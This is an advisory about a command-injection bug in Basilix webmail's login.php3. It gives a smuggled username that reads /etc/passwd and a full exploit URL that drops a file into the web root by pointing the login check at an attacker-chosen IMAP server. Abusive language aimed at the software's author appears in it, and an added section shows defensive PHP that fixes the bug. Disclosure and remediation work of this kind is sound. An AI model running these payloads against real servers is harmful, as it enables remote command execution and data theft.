Basilix Webmail System - executing command

Version Affected : Basilix 1.0.2/3 series

Bug:

There is a bug in the Basilix package which allows executing any command on the attacked system. The bug has been known since June, but Author of basilix is a dick so fuck you.

From file login.php3 :

    $atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
    . . .
    $mkcmd = "/bin/mkdir -p $atch_dir";
    @exec($mkcmd);

We can pass an evil username, e.g.

    username=blah;cat%20/etc/passwd

but it will fail, because the script tries to connect to the IMAP server and authenticate with the username and password. To pass this check we must set up a fake IMAP server or something like that. We can pass the address and port of the IMAP server, so it's not a problem.

Example Exploit :

    victim.host/basilix.php3?username=blah;echo%20"">js/blah.php&password=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=blah.com.pl&bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_tick&nocookie=1&BSX_TestCookie=1&SESSID=1

If you don't write a fake IMAP server, you must add the username to /etc/passwd and /etc/shadow and set a password for it. The directory present in the username (js) should be writable (it normally is). You can of course write to tmp or elsewhere, but you must use another bug (see bugtraq, also mine ;) to access it. The last three variables are set to stop the script from checking whether cookies are set. <- stupid sentence

Karol Wiesek - appelast
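
Added example (not part of the original advisory and not Basilix code): one way to close both conditions described above, the username reaching a shell through exec() and the IMAP host and port being taken from the request. The DOMAINS table, the helper names safe_component() and attachment_dir(), and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not Basilix code. All names here are hypothetical.

// Server-side domain table. It is never merged with request variables,
// so a client cannot point the login check at an IMAP server of its choosing.
const DOMAINS = [
    'example.org' => ['imap_host' => 'imap.example.org', 'imap_port' => 143],
];

function safe_component(string $value): string
{
    // Allowlist for one path component: letters, digits, '.', '_' and '-'.
    // Shell metacharacters, '/', whitespace, leading dots and ".." are rejected.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}\z/', $value)
        || strpos($value, '..') !== false) {
        throw new InvalidArgumentException('invalid name');
    }
    return $value;
}

function attachment_dir(string $base, string $domain, string $username): string
{
    // The domain must be a key of the server-side table, not free-form input.
    if (!array_key_exists($domain, DOMAINS)) {
        throw new InvalidArgumentException('unknown domain');
    }
    $dir = $base . '/' . $domain . '/' . safe_component($username);
    // mkdir() with recursive=true replaces "/bin/mkdir -p"; no shell is involved.
    if (!is_dir($dir) && !mkdir($dir, 0700, true) && !is_dir($dir)) {
        throw new RuntimeException('cannot create attachment directory');
    }
    return $dir;
}

// Constructed sample input; the second value has the shape of the advisory's username.
$base = sys_get_temp_dir() . '/bsx_atch_demo';
foreach (['alice', 'blah;cat /etc/passwd', '../../js/x'] as $u) {
    try {
        echo 'ok: ', attachment_dir($base, 'example.org', $u), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', json_encode($u), "\n";
    }
}
```

Where calling an external program cannot be avoided, pass each argument through escapeshellarg() in addition to the allowlist check.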